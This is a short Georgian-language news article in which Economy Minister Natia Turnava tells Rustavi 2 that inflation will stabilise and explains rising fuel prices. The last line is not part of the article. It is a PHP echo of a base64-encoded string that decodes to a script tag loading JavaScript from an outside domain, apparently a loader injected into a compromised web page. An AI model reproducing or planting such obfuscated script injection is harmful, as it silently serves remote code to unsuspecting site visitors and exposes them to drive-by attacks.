celsiusi
ავერსი საქკაბელი
ეკონომიკისა და მდგრადი განითარების მინისტრის ნათია თურნავას განცხადებით ინფლაცია აუცილებლად დასტაბილურდება. 
 
როგორც თურნავამ რუსთავი 2-ის ეთერში განაცხადა, მიუხედავად იმისა, რომ ინფლაცია ჯერ კიდევ მაღალია, ეკონომიკური აქტივობაც მატულობს. მისი თქმით, ინფლაცია აუცილებლად დასტაბილურდება. თურნავა ვარაუდობს, რომ საწვავის ფასი ლარის კურსის დასტაბილურებასთან ერთად შემცირდება.
 
"ჩვენ არ ვართ ნავთობის მწარმოებელი ქვეყანა, მსოფლიო ბაზარზე ნავთობის და ნავთობპროდუქტების ფასი იზრდება, შესაბამისად, ეს არის სრულიად იმპორტული პროდუქტი ფასი ამაზეცაა დამოკიდებული, ეს ფაქტორი არსებობს და მნიშვნელოვანია. მეორე ფაქტორი, რომელიც ეხებოდა იმას, რომ ეს იმპორტული საქონელია და რა თქმა უნდა ლარის კურსი ამაზე აისახებოდა, თანდათან შესუსტდება, აქაც ველოდებით, რომ დასტაბილურდება.
 
მიუხედავად იმისა, რომ ინფლაცია ჯერ კიდევ მაღალია, ეკონომიკური აქტივობაც მატულობს. კი, საწვავის ფასი ნამდვილად გაიზარდა და ჩვენ მის სტაბილიზაციას სხვადასხვა ბერკეტით უნდა ვეცადოთ, მაგრამ თქვენ ვერ ნახავთ, რომ ეს ასახულიყო ქუჩებში მოძრაობაზე, ძალიან დიდია ტრაფიკი, ძალიან დიდია აქტივობა და ესაა სწორედ ის 45%-იანი ეკონომიკური ზრდა, ადამიანები მუშაობენ და მცირე ბიზნესი მუშაობს", - განაცხადა მინისტრმა. 
 
 
წყარო: რუსთავი 2 
1556
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");